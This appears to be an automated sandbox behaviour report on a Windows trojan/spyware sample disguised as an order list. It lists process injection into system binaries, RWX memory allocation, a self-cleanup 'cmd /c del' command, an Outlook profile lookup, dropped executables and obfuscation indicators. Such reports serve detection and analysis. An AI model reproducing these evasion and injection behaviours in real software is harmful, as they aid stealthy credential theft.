Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ????.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ?l .dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???t.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2?f???.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2?f???.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2?f???.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2?f???.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2?f???.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2?f???.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2?f???.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2?f???.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2?????.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2?????.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2?????.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2?????.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2?????.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ?l .dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ????.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ????.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ????.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ????.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??i.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??i.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??i.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??i.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ????.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ?l.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ?l.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ?l.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ?l.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ?l.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ????.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ?l.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ?l.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ?l.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ?l.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ?l.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???b.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???b.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???b.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???b.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???b.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???b.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???b.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???b.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???b.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???b.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???b.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???b.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???b.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???b.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???b.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ????.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ?l .dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???t.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2?f???.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2?f???.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2?f???.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2?f???.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2?f???.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2?f???.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2?f???.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2?f???.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2?????.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2?????.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2?????.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2?????.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2?????.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ?l .dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ????.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ????.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ????.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ????.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??i.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??i.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??i.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??i.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ????.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ?l.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ?l.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ?l.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ?l.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ?l.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ????.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ?l.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ?l.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ?l.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ?l.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ?l.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???2.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???b.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???b.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???b.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???b.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???b.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???b.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???b.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???b.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???b.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???b.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???b.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???b.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???b.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???b.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ???b.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Section loaded: ??l.dll Jump to behavior
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Memory allocated: 72480000 page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Memory allocated: 72480000 page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Memory allocated: 72480000 page no access Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Memory allocated: 72480000 page read and write Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Memory allocated: 72481000 page read and write Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Memory allocated: 72480000 page execute and read and write Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Memory allocated: 72480000 page execute and read and write Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Memory allocated: 72480000 page no access Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Memory allocated: 72480000 page read and write Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Memory allocated: 72481000 page read and write Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Memory allocated: 72480000 page execute and read and write Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Memory allocated: 72480000 page execute and read and write Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Memory allocated: 72480000 page no access Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Memory allocated: 72480000 page read and write Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Memory allocated: 72481000 page read and write Jump to behavior
Source: Noua lista de comenzi.exe Virustotal: Detection: 32%
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe File read: C:\Users\user\Desktop\Noua lista de comenzi.exe Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Noua lista de comenzi.exe "C:\Users\user\Desktop\Noua lista de comenzi.exe"
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Process created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\Contacts\Tdfgwnfyyv.exe "C:\Users\user\Contacts\Tdfgwnfyyv.exe"
Source: C:\Windows\explorer.exe Process created: C:\Users\user\Contacts\Tdfgwnfyyv.exe "C:\Users\user\Contacts\Tdfgwnfyyv.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
Source: C:\Windows\SysWOW64\systray.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\DpiScaling.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Process created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\Contacts\Tdfgwnfyyv.exe "C:\Users\user\Contacts\Tdfgwnfyyv.exe" Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\DpiScaling.exe" Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Tdfgwnfyyvslxmhqyfimidqqywchnji[1] Jump to behavior
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\Fg00t0t5x Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@14/8@26/17
Source: C:\Windows\explorer.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6248:120:WilError_01
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\systray.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Binary string: systray.pdb source: DpiScaling.exe, 0000000D.00000002.443630865.0000000000650000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: systray.pdbGCTL source: DpiScaling.exe, 0000000D.00000002.443630865.0000000000650000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: DpiScaling.exe, 0000000D.00000002.445684941.00000000045E0000.00000040.00000800.00020000.00000000.sdmp, DpiScaling.exe, 0000000D.00000002.447244201.00000000046FF000.00000040.00000800.00020000.00000000.sdmp, systray.exe, 00000014.00000002.811879967.0000000004490000.00000040.00000800.00020000.00000000.sdmp, systray.exe, 00000014.00000002.812401712.00000000045AF000.00000040.00000800.00020000.00000000.sdmp, logagent.exe, 00000016.00000002.477462244.0000000004A3F000.00000040.00000800.00020000.00000000.sdmp, logagent.exe, 00000016.00000002.475842271.0000000004920000.00000040.00000800.00020000.00000000.sdmp, logagent.exe, 00000019.00000002.481489671.0000000004A40000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: DpiScaling.exe, DpiScaling.exe, 0000000D.00000002.445684941.00000000045E0000.00000040.00000800.00020000.00000000.sdmp, DpiScaling.exe, 0000000D.00000002.447244201.00000000046FF000.00000040.00000800.00020000.00000000.sdmp, systray.exe, systray.exe, 00000014.00000002.811879967.0000000004490000.00000040.00000800.00020000.00000000.sdmp, systray.exe, 00000014.00000002.812401712.00000000045AF000.00000040.00000800.00020000.00000000.sdmp, logagent.exe, 00000016.00000002.477462244.0000000004A3F000.00000040.00000800.00020000.00000000.sdmp, logagent.exe, 00000016.00000002.475842271.0000000004920000.00000040.00000800.00020000.00000000.sdmp, logagent.exe, 00000019.00000002.481489671.0000000004A40000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: DpiScaling.pdb source: systray.exe, 00000014.00000002.810319814.0000000000193000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000014.00000002.812850284.0000000004AE7000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: DpiScaling.pdbGCTL source: systray.exe, 00000014.00000002.810319814.0000000000193000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000014.00000002.812850284.0000000004AE7000.00000004.10000000.00040000.00000000.sdmp

Data Obfuscation
barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0465D0D1 push ecx; ret 13_2_0465D0E4
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_0450D0D1 push ecx; ret 20_2_0450D0E4
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_02D5C8CF pushad ; ret 20_2_02D5C8D6
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_02D5B88C push eax; ret 20_2_02D5B892
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_02D5B03A push es; retf 20_2_02D5B03B
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_02D5B822 push eax; ret 20_2_02D5B828
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_02D5B82B push eax; ret 20_2_02D5B892
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_02D5B7D5 push eax; ret 20_2_02D5B828
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_02D55F80 push ebx; ret 20_2_02D55F81
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_02D55C0F push edx; ret 20_2_02D55C10
Binary contains a suspicious time stamp
Source: 6ld01n28q8c.exe.14.dr Static PE information: 0x8BD20D94 [Mon May 2 10:51:00 2044 UTC]

Persistence and Installation Behavior
barindex
Drops PE files
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\Fg00t0t5x\6ld01n28q8c.exe Jump to dropped file
